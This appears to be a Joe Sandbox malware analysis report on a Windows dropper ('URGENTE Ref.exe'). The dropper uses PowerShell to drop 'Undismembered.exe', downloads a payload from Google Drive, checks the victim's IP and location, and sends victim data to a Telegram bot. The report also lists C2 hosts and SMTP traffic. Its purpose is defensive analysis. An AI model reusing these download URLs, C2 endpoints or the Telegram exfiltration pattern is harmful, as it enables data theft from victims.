          Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewASN Name: DINAHOSTING-ASES DINAHOSTING-ASES
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49703 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49700 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49706 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49704 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49708 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49696 -> 142.250.185.142:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49702 -> 104.21.32.1:443
          Source: global trafficTCP traffic: 192.168.2.6:63196 -> 82.98.167.108:587
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1zH4lzTrOb74mkiGTG8MqxioQ1lqpMPyE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1zH4lzTrOb74mkiGTG8MqxioQ1lqpMPyE&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49701 version: TLS 1.0
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1zH4lzTrOb74mkiGTG8MqxioQ1lqpMPyE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1zH4lzTrOb74mkiGTG8MqxioQ1lqpMPyE&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2011/03/2025%20/%2007:39:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficDNS traffic detected: DNS query: mail.bsp.com.es
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 10 Mar 2025 07:39:37 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: Undismembered.exe, 0000000A.00000002.2495516741.000000002076C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: Undismembered.exe, 0000000A.00000002.2495516741.000000002077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.bsp.com.es
          Source: Undismembered.exe, Undismembered.exe, 0000000A.00000000.1599838202.0000000000409000.00000008.00000001.01000000.00000009.sdmp, URGENTE Ref.exe, Undismembered.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: URGENTE Ref.exe, Undismembered.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000002.00000002.1603604758.000000000625A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000002.00000002.1601132582.0000000005346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000002.00000002.1601132582.0000000005346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000002.00000002.1601132582.00000000051F1000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2495516741.0000000020581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000002.00000002.1601132582.0000000005346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: powershell.exe, 00000002.00000002.1601132582.0000000005346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: Undismembered.exe, 0000000A.00000002.2496698754.000000002185C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
          Source: powershell.exe, 00000002.00000002.1601132582.00000000051F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 00000002.00000002.1601132582.0000000005346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020663000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020663000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020663000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020663000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20a
          Source: Undismembered.exe, 0000000A.00000003.1728189274.00000000040E2000.00000004.00000020.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000003.1792265177.00000000040C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
          Source: Undismembered.exe, 0000000A.00000002.2496698754.000000002185C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: Undismembered.exe, 0000000A.00000002.2496698754.0000000021897000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2496698754.000000002185C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: Undismembered.exe, 0000000A.00000002.2496698754.0000000021897000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2496698754.000000002185C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
          Source: powershell.exe, 00000002.00000002.1603604758.000000000625A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000002.00000002.1603604758.000000000625A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000002.00000002.1603604758.000000000625A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: Undismembered.exe, 0000000A.00000002.2478474026.0000000004038000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: Undismembered.exe, 0000000A.00000002.2478474026.0000000004038000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/_
          Source: Undismembered.exe, 0000000A.00000002.2479186635.0000000005CB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1zH4lzTrOb74mkiGTG8MqxioQ1lqpMPyE
          Source: Undismembered.exe, 0000000A.00000002.2478474026.0000000004073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1zH4lzTrOb74mkiGTG8MqxioQ1lqpMPyE-
          Source: Undismembered.exe, 0000000A.00000002.2478474026.0000000004073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1zH4lzTrOb74mkiGTG8MqxioQ1lqpMPyEK
          Source: Undismembered.exe, 0000000A.00000002.2478474026.00000000040A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: Undismembered.exe, 0000000A.00000003.1792265177.00000000040C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1zH4lzTrOb74mkiGTG8MqxioQ1lqpMPyE&export=download
          Source: Undismembered.exe, 0000000A.00000002.2478474026.00000000040A3000.00000004.00000020.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000003.1792265177.00000000040C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/n
          Source: Undismembered.exe, 0000000A.00000002.2496698754.000000002185C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: Undismembered.exe, 0000000A.00000002.2496698754.0000000021897000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2496698754.000000002185C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
          Source: Undismembered.exe, 0000000A.00000002.2496698754.000000002185C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: Undismembered.exe, 0000000A.00000002.2496698754.000000002185C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
          Source: powershell.exe, 00000002.00000002.1601132582.0000000005346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000002.00000002.1603604758.000000000625A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: Undismembered.exe, 0000000A.00000002.2495516741.00000000205CD000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2495516741.000000002063C000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2495516741.0000000020663000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: Undismembered.exe, 0000000A.00000002.2495516741.00000000205CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020663000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
          Source: Undismembered.exe, 0000000A.00000002.2495516741.00000000205F7000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2495516741.000000002063C000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2495516741.0000000020663000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
          Source: Undismembered.exe, 0000000A.00000003.1728189274.00000000040E2000.00000004.00000020.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000003.1792265177.00000000040C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
          Source: Undismembered.exe, 0000000A.00000002.2496698754.0000000021897000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2496698754.000000002185C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
          Source: Undismembered.exe, 0000000A.00000003.1728189274.00000000040E2000.00000004.00000020.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000003.1792265177.00000000040C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
          Source: Undismembered.exe, 0000000A.00000003.1728189274.00000000040E2000.00000004.00000020.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000003.1792265177.00000000040C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: Undismembered.exe, 0000000A.00000002.2496698754.0000000021897000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2496698754.000000002185C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
          Source: Undismembered.exe, 0000000A.00000003.1728189274.00000000040E2000.00000004.00000020.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000003.1792265177.00000000040C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
          Source: Undismembered.exe, 0000000A.00000003.1728189274.00000000040E2000.00000004.00000020.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000003.1792265177.00000000040C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020741000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2495516741.0000000020732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020741000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
          Source: Undismembered.exe, 0000000A.00000002.2495516741.000000002073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63195
          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
          Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 63195 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
          Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:49696 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.217.18.97:443 -> 192.168.2.6:49698 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:63195 version: TLS 1.2
          Source: C:\Users\user\Desktop\URGENTE Ref.exeCode function: 0_2_004051BA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004051BA

          System Summary

          barindex
          Powershell drops PE file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Undismembered.exeJump to dropped file
          Source: C:\Users\user\Desktop\URGENTE Ref.exeCode function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040322B
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,10_2_0040322B
          Source: C:\Users\user\Desktop\URGENTE Ref.exeCode function: 0_2_004049F90_2_004049F9
          Source: C:\Users\user\Desktop\URGENTE Ref.exeCode function: 0_2_004064AE0_2_004064AE
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_004049F910_2_004049F9
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_004064AE10_2_004064AE
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_0015C19B10_2_0015C19B
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_0015D27810_2_0015D278
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_0015537010_2_00155370
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_0015C46810_2_0015C468
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_0015C73810_2_0015C738
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_0015E98810_2_0015E988
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_001569A010_2_001569A0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_001529E010_2_001529E0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_0015CA0810_2_0015CA08
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_0015CCD810_2_0015CCD8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_00159DE010_2_00159DE0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_00153E0910_2_00153E09
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_0015CFAC10_2_0015CFAC
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_00156FC810_2_00156FC8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_0015F97410_2_0015F974
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_0015E97C10_2_0015E97C
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_042A07E010_2_042A07E0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_042A9CF010_2_042A9CF0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_042A31F810_2_042A31F8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_042A03B410_2_042A03B4
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226C2A9010_2_226C2A90
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226C1FA810_2_226C1FA8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226C944810_2_226C9448
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226C185010_2_226C1850
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226C514810_2_226C5148
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226CF93010_2_226CF930
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226C966810_2_226C9668
